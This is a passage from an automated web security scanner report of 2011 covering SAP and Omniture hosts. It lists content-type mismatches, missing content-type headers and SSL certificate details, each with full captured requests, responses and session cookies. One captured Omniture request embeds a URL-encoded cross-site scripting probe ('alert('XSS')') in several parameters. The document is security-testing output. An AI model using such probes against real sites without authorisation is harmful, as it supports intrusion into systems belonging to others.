Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:25:48 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:25:48 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:25:48 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:25:47 GMT
Content-Length: 21

var sap_token = null;
24.21. http://www.sap.com/siteservice.epx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sap.com
Path:   /siteservice.epx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

POST /siteservice.epx?kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
Content-Length: 9
Origin: http://www.sap.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=check#true#1318688580|session#1318688512533-813903#1318690380; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

suggest:s

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:23:08 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:23:08 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:23:07 GMT
Content-Length: 123

["saas","sap","sap ag","sap business by design","sap by design","sap crm 2007","sap shop","sap store","saphire","sapphire"]
24.22. https://www.sap.com/profile/login.epx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.sap.com
Path:   /profile/login.epx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /profile/login.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
Content-Length: 13854
Origin: https://www.sap.com
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
X-MicrosoftAjax: Delta=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: https://www.sap.com/profile/login.epx?pmelayer=true&kNtBzmUK9zU=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B

mymgr=pnlUpdate%7CmobjTemplate%24ctl01%24ctl00%24ctl00%24Submit&__EVENTTARGET=mobjTemplate%24ctl01%24ctl00%24ctl00%24Submit&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTIwNTgyMTAwMzQPZBYCAgUP
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:27:23 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:27:23 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:27:22 GMT
Content-Length: 86312

48587|#||4|48587|updatePanel|pnlUpdate|        
       
           
<table border="0" cellpadding="0" cellspacing="0" align="center">
   <tr>
       <td width="2" style="background-image:url(/global/im
...[SNIP]...
24.23. https://www.sap.com/sme/contactsap/FormCodesRemote.epi  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.sap.com
Path:   /sme/contactsap/FormCodesRemote.epi

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /sme/contactsap/FormCodesRemote.epi?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
Content-Length: 86
Origin: https://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/xml
Accept: */*
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|

{"method":"GetCodeTranslationsByParentCategoryWithLocaleID","arguments":[1,"",2,1033]}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:32 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:32 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:31 GMT
Content-Length: 36

"new Array(1,'',2,1033,new Array())"
24.24. http://www.sapandasug.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sapandasug.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: www.sapandasug.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=1211052; CFTOKEN=25795824

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Sat, 15 Oct 2011 14:24:25 GMT
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.
24.25. http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sapbusinessoptimizer.com
Path:   /fonts/SAPSans2007ExtraBoldCond.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /fonts/SAPSans2007ExtraBoldCond.woff HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:38 GMT
Server: Apache
Last-Modified: Tue, 04 May 2010 10:12:02 GMT
ETag: "6be4d-9ed4-485c1f0cd2080"
Accept-Ranges: bytes
Content-Length: 40660
Content-Type: text/plain

wOFFOTTO....................................CFF ..    ...w....@....GPOS...d...n..+.V...GSUB.......h..
.L.R8OS/2...h...U...`..u/cmap..........."o..fhead.......3...6..P.hhea...<...!...$    O..hmtx..........    .
...[SNIP]...
24.26. http://www.sapvirtualevents.com/JControls/Header/template/header.htm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sapvirtualevents.com
Path:   /JControls/Header/template/header.htm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /JControls/Header/template/header.htm HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapvirtualevents.com/teched/default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55; IsFirstTimeLogin=1; userID=1; securityRoleID=0; .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||edcbb5be-eddd-4d03-b903-d45503e9170c|United States|4b117873-111d-43fb-aa45-4e60c941153b|true; __utma=217282836.383781452.1318689024.1318689024.1318689024.1; __utmb=217282836.2.10.1318689025; __utmc=217282836; __utmz=217282836.1318689025.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.1.cbc3=7b9b230ebda00332.1318689026.1.1318689026.1318689026.; _pk_ses.1.cbc3=*

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 17 Aug 2011 10:52:36 GMT
Accept-Ranges: bytes
ETag: "0322fc6cb5ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:30 GMT
Content-Length: 1854

...    <div id="nav">
<ul>
{#foreach $T.d.LinkLevel1_List as record}
{#if $T.record$iteration == 0 || $T.record$iteration == 1 || $T.record$iteration == 2}
{#if $T.record.IsActive == 1}
...[SNIP]...
25. Content type is not specified  previous  next
There are 2 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

25.1. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1318686440062-338730&mboxPC=1318631777052-118529.19&mboxPage=1318686440062-338730&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=9&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1318668457851&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&eVar17=7%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1318686440062-338730; mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631777052-118529.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:47:20 GMT; Path=/m2/omnituremarketing
Content-Length: 220
Date: Sat, 15 Oct 2011 13:47:19 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318631777052-118529.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...
25.2. http://sapglobalmarketingin.tt.omtrdc.net/m2/sapglobalmarketingin/sc/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sapglobalmarketingin.tt.omtrdc.net
Path:   /m2/sapglobalmarketingin/sc/standard

Request

GET /m2/sapglobalmarketingin/sc/standard?mboxHost=store.businessobjects.com&mboxSession=1318689062767-959486&mboxPage=1318689062767-959486&mboxCount=1&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1318671062929&visitorID=50271dcd9baa4ef3893c9fb47c6b6fd7&visitorNamespace=sap&pageName=estores%3Aus%3Ahomepage&currencyCode=USD&channel=estores&server=estores&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1326&browserHeight=890&dynamicAccountSelection=true&dynamicAccountList=sapvbudev%3Ddigitalriver.com&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=true&linkDownloadFileTypes=rar%2Cexe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=streamwork.com%2Csapstreamwork.com%2Caboutsapcampbell.com%2Canalytics-usa.com%2Cestara.com%2Cbestsapchina.com%2Cbusinessobjects.com%2Cbusinessobjects.com.pl%2Cbusiness-objects.com.pl%2Cbusinessobjects.pl%2Cbusiness-objects.pl%2Ccareersatsap.com%2Ccfolder.de%2Ccfolders.com%2Ccfolders.de%2Ccfolders.net%2Ccrystalreports.com%2Cdigitalriver.com%2Cedusap.at%2Cfazi.at%2Cfazi.com%2Cfazi.de%2Cfuturefactoryinitiative.com%2Cfuturefactoryinitiative.org%2Cfuzzy.at%2Cfuzzy.ch%2Cfuzzy-informatik.com%2Cfuzzy-informatik.de%2Cfuzzy-online.com%2Cfuzzy-online.de%2Cinfommersion.com%2Condemand.com%2Csap.at%2Csap.bg%2Csap.biz%2Csap.ca%2Csap.ch%2Csap.cl%2Csap.cn%2Csap.co.at%2Csap.co.il%2Csap.co.jp%2Csap.co.kr%2Csap.co.nz%2Csap.co.th%2Csap.co.uk%2Csap.co.za%2Csap.com%2Csap.com.au%2Csap.com.cn%2Csap.com.pl%2Csap.com.sg%2Csap.com.tr%2Csap.com.tw%2Csap.cz%2Csap.de%2Csap.ee%2Csap.fi%2Csap.hk%2Csap.hr%2Csap.hu%2Csap.ie%2Csap.in%2Csap.info%2Csap.kz%2Csap.lu%2Csap.nl%2Csap.pl%2Csap.pt%2Csap.ro%2Csap.ru%2Csap.si%2Csap.sk%2Csap.tw%2Csap.ua%2Csap.us%2Csapag.de%2Csap-ag.de%2Csapamerica.com%2Csap-answer.com%2Csap-austria.com%2Csap-best-fit-adviser.com%2Csapbusinessbydesign.cn%2Csapbusinessbydesign.co.uk%2Csapbusinessbydesign.com%2Csapbusinessbydesign.de%2Csapbusinessbydesign.us%2Csapbusinessobjects.com.pl%2Csap-business-objects.com.pl%2Csapbusinessobjects.pl%2Csap-business-objects.pl%2Csapbusinessobjectsresponses.com%2Csapbusinessone.pl%2Csap-campbell.com%2Csapcampbell.net%2Csapcampbell.org%2Csapchina.com%2Csapclear.com%2Csapconfigurator.com%2Csapdesignguild.org%2Csap-event.jp%2Csapevents.com%2Csap-forum.de%2Csap-insights.com%2Csapkhimetrics.com%2Csaplabs.bg%2Csaplabs.co.in%2Csaplabs.fr%2Csaplabs.in%2Csapnetweaver.com%2Csapphirenow.com%2Csap-retail.de%2Csapsapphire.com%2Csapsem.com%2Csap-spectrum.com%2Csapstreamwork.com%2Csapteched.com%2Csapthai.com%2Csapturkiye.com.tr%2Csap-tv.com%2Csapventures.com%2Csapworldtour.com%2Csapworldtour2010.com%2Csteeb.de%2Csap.corp%2Csaplabs.com%2Csybase.com%2Csappartneredge.eu%2Cjavascript%3A%2Cstore.businessobjects.com&linkTrackVars=visitorID%2Cserver&linkTrackEvents=None&prop1=na&eVar1=estores%3Aus&hier1=estores%2Cna%2Cus&prop2=english&eVar2=english&eVar3=estores&prop5=us&prop8=new&eVar8=new&prop9=logN&eVar9=logN&eVar13=CG4DA4BC51&prop14=logN%7Cestores%3Aus%3Ahomepage&prop15=null%7Cestores%3Aus%3Ahomepage&eVar15=%7C&eVar18=%2B1&eVar19=estores%2Cna%2Cus&eVar20=estores%3Aus%3Ahomepage&eVar35=http%3A%2F%2Fwww.sap.com%2Findex.epx&eVar36=CG4DA4BC51&prop38=saturday%7C4%3A30pm&eVar38=saturday%7C4%3A30pm&prop47=1&prop50=estores%3A2011.04.18%7Cgl%3A2011.09.07&mboxURL=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2FDisplayHomePage%2Fpgm.%2B77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1318689037443&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: sapglobalmarketingin.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 220
Date: Sat, 15 Oct 2011 14:30:44 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318689062767-959486.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...
26. SSL certificate  previous
There are 3 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

26.1. https://weblogs.sdn.sap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogs.sdn.sap.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  weblogs.sdn.sap.com
Issued by:  TC TrustCenter Class 2 L1 CA XI
Valid from:  Wed Jul 27 03:33:38 CDT 2011
Valid to:  Fri Aug 10 07:49:40 CDT 2012

Certificate chain #1

Issued to:  TC TrustCenter Class 2 L1 CA XI
Issued by:  TC TrustCenter Class 2 CA II
Valid from:  Tue Nov 03 08:08:26 CST 2009
Valid to:  Wed Dec 31 15:59:59 CST 2025

Certificate chain #2

Issued to:  TC TrustCenter Class 2 CA II
Issued by:  TC TrustCenter Class 2 CA II
Valid from:  Thu Jan 12 08:38:43 CST 2006
Valid to:  Wed Dec 31 16:59:59 CST 2025

Certificate chain #3

Issued to:  TC TrustCenter Class 2 CA II
Issued by:  TC TrustCenter Class 2 CA II
Valid from:  Thu Jan 12 08:38:43 CST 2006
Valid to:  Wed Dec 31 16:59:59 CST 2025
26.2. https://www.sap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.sap.com
Issued by:  TC TrustCenter Class 2 L1 CA XI
Valid from:  Mon Jul 25 07:31:51 CDT 2011
Valid to:  Fri Aug 10 09:28:03 CDT 2012

Certificate chain #1

Issued to:  TC TrustCenter Class 2 L1 CA XI
Issued by:  TC TrustCenter Class 2 CA II
Valid from:  Tue Nov 03 08:08:26 CST 2009
Valid to:  Wed Dec 31 15:59:59 CST 2025

Certificate chain #2

Issued to:  TC TrustCenter Class 2 CA II
Issued by:  TC TrustCenter Class 2 CA II
Valid from:  Thu Jan 12 08:38:43 CST 2006
Valid to:  Wed Dec 31 16:59:59 CST 2025
26.3. https://www.sdn.sap.com/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sdn.sap.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.sdn.sap.com,ST=Baden-Wuerttemberg
Issued by:  Akamai Subordinate CA 3
Valid from:  Mon Nov 29 09:23:51 CST 2010
Valid to:  Tue Nov 29 09:23:51 CST 2011

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018
Report generated by XSS.CX at Sat Oct 15 10:38:55 CDT 2011.